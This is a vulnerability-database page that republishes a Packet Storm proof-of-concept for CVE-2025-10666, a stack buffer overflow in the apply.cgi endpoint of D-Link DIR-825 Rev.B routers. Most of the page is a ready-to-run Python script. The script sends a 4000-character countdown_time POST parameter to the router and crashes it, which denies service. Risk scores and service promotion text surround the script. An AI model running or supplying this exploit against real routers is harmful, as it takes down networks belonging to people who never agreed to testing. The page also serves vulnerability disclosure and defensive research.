Lucene search
K

📄 D-Link DIR-825 Rev.B 2.10 Buffer Overflow

🗓️ 05 Feb 2026 00:00:00Reported by Beatriz Fresno NaumovaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 123 Views

D-Link DIR-825 Rev.B 2.10 stack buffer overflow in apply.cgi via countdown_time, causing DoS.

Related
Code
# Exploit Title: D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS)
    # Google Dork: N/A
    # Date: 2025-09-25
    # Exploit Author: Beatriz Fresno Naumova
    # Vendor Homepage: https://www.dlink.com/
    # Software Link: https://tsd.dlink.com.tw/downloads2008detail.asp
    # Version: DIR-825 Rev.B <= 2.10
    # Tested on: DIR-825 Rev.B physical hardware, local network
    # CVE: CVE-2025-10666
    #
    # Description:
    # A stack-based buffer overflow vulnerability exists in the apply.cgi endpoint of the
    # D-Link DIR-825 Rev.B router (firmware <= 2.10), triggered via the countdown_time parameter.
    # This PoC sends an overly long POST parameter to crash the process.
    
    import requests
    
    TARGET = "http://192.168.0.1/apply.cgi"  # Change this to the router's IP
    LENGTH = 4000                            # Adjust length for testing / fuzzing
    PAYLOAD = "1" * LENGTH
    
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": "http://192.168.0.1/",
    }
    
    data = {
        "countdown_time": PAYLOAD
    }
    
    try:
        print(f"[+] Sending exploit payload ({LENGTH} bytes) to {TARGET}")
        r = requests.post(TARGET, headers=headers, data=data, timeout=5)
        print(f"[+] Status Code: {r.status_code}")
        print("[+] Exploit sent. Check if the router crashes or becomes unresponsive.")
    except Exception as e:
        print(f"[-] Failed to send exploit: {e}")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Feb 2026 00:00Current
8.2High risk
Vulners AI Score8.2
CVSS 3.18.8 - 9.8
CVSS 48.7
CVSS 29
CVSS 38.8
EPSS0.03039
SSVC
123